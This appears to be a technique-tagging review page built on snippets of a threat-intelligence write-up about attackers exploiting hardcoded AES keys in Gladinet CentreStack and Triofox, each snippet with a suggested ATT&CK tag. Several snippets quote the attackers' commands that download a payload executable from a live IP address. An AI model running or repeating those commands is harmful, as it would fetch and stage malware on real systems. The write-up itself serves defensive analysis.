"##request http : / / 185. 196. 11. 207 : 8000 / conqueror. exe - outfile c : \ users \ public \ conqueror. exe figure 1 : process tree for detected powershell command execution on dec. 15 across two incidents in one of the incidents, after the payload was retrieved from hxxp [ : …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
96%
"gladinet centrestack / triofox : cryptography vulnerability | huntress acknowledgments : special thanks to john hammond for his contributions to this investigation and write - up. update # 2 : 12 / 18 / 25 @ 6pm et we ’ ve seen reports from other intelligence firms that note that…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1486Data Encrypted for Impact
91%
"that reveals the following in cleartext : curl http : / / 185. 196. 11. 207 : 8000 unfortunately, the conqueror. exe was no longer present on the file system for us to analyze further. we uncovered the sha256 hash e9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5 b…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
83%
"a ticket that never expires. the attacker can reuse this exact url indefinitely to download the server ' s configuration. exploitation activity as of december 10, we have seen nine organizations that have been impacted by this vulnerability. these businesses ranged across differe…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1486Data Encrypted for Impact
66%
"file system as that specific user. upon debugging the running process, we discovered that the generateseckey, located in gladctrl64. dll returns the exact same 100 - byte text strings. - the key source : a static string of chinese text. - the iv source : a static string of japane…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.003Kerberoasting
48%
". this method retrieves the first 32 bytes of the static syskey and the first 16 bytes of syskey1 to configure an aes - 256 decryption provider. because these keys are derived from the generated 100 - byte strings, any ticket encrypted with these specific bytes is trusted by the …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1486Data Encrypted for Impact
46%
"cve - 2025 - 30406. at present, we cannot say definitively that this is exploitation by the cl0p ransomware gang, but considering the timing of this reporting, we felt it was prudent to share this recent threat intel. we are continuing the hunt and monitoring for further gladinet…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1486Data Encrypted for Impact
38%
"gladinet centrestack / triofox : cryptography vulnerability | huntress acknowledgments : special thanks to john hammond for his contributions to this investigation and write - up. update # 2 : 12 / 18 / 25 @ 6pm et we ’ ve seen reports from other intelligence firms that note that…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Threat actors are exploiting a vulnerability in Gladinet’s CentreStack and Triofox products that stems from hardcoded cryptographic keys in the AES implementation.